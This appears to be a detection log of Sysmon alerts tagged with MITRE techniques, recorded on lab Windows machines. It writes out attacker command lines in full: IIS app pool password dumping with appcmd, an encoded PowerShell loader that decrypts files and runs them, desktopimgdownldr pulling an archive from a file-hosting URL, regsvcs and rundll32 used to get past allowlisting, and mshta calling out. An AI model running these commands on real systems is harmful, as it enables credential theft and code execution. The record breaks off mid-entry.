SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 18 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:12.919 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cryptdll.dll 6.1.7600.16385 (win7_rtm.090713-1255) Cryptography Manager Microsoft® Windows® Operating System Microsoft Corporation SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 18 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:12.919 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cryptdll.dll 6.1.7600.16385 (win7_rtm.090713-1255) Cryptography Manager Microsoft® Windows® Operating System Microsoft Corporation SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5922 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.322 365ABB72-3D6E-5CEB-0000-00104C92FF00 3100 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" ),1," 1 5 4 1 0 0x8000000000000000 5260 Microsoft-Windows-Sysmon/Operational PC04.example.corp 2019-03-17 20:17:52.899 365ABB72-AB70-5C8E-0000-0010781D0A00 3272 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\ PC04\IEUser 365ABB72-A960-5C8E-0000-002004C00300 0x3c004 1 High MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-A965-5C8E-0000-0010D9100400 3884 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd)",1," 1 5 4 1 0 0x8000000000000000 424261 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:22.062 747F3D96-51FE-5F93-0000-0010DC535E00 8920 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd C:\PROGRA~3\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51FD-5F93-0000-00103B425E00 7504 C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," 1 5 4 1 0 0x8000000000000000 424261 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:22.062 747F3D96-51FE-5F93-0000-0010DC535E00 8920 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd C:\PROGRA~3\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51FD-5F93-0000-00103B425E00 7504 C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," 1 5 4 1 0 0x8000000000000000 424261 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:22.062 747F3D96-51FE-5F93-0000-0010DC535E00 8920 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd C:\PROGRA~3\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51FD-5F93-0000-00103B425E00 7504 C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5919 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.232 365ABB72-3D6E-5CEB-0000-00108C8EFF00 3144 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1," 1 5 4 1 0 0x8000000000000000 305352 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-03 08:47:20.001 747F3D96-F098-5EFE-0000-001012E13801 1932 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr C:\Users\IEUser\ MSEDGEWIN10\IEUser 747F3D96-1CE4-5EFE-0000-0020CC9C0800 0x89ccc 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-EF3D-5EFE-0000-0010F3653401 5384 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3," 3 5 4 3 0 0x8000000000000000 7649 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-15 07:13:42.577 365ABB72-9AA6-5D04-0000-00109C850F00 652 C:\Windows\System32\mshta.exe IEWIN7\IEUser tcp true false 10.0.2.13 IEWIN7 49159 false 10.0.2.18 4443 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1," 1 5 4 1 0 0x8000000000000000 8352 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-07-03 20:39:30.254 365ABB72-1282-5D1D-0000-0010DD401B00 2328 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-0A6F-5D1D-0000-0020CA350100 0x135ca 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1256-5D1D-0000-0010FB1A1B00 1632 C:\Windows\System32\notepad.exe "C:\Windows\system32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," 1 5 4 1 0 0x8000000000000000 8352 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-07-03 20:39:30.254 365ABB72-1282-5D1D-0000-0010DD401B00 2328 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-0A6F-5D1D-0000-0020CA350100 0x135ca 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1256-5D1D-0000-0010FB1A1B00 1632 C:\Windows\System32\notepad.exe "C:\Windows\system32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," 1 5 4 1 0 0x8000000000000000 8352 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-07-03 20:39:30.254 365ABB72-1282-5D1D-0000-0010DD401B00 2328 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-0A6F-5D1D-0000-0020CA350100 0x135ca 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1256-5D1D-0000-0010FB1A1B00 1632 C:\Windows\System32\notepad.exe "C:\Windows\system32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4917 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:28.222 747F3D96-6628-5D3F-0000-001062788800 2040 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5916 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.161 365ABB72-3D6E-5CEB-0000-0010CC8AFF00 2524 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAY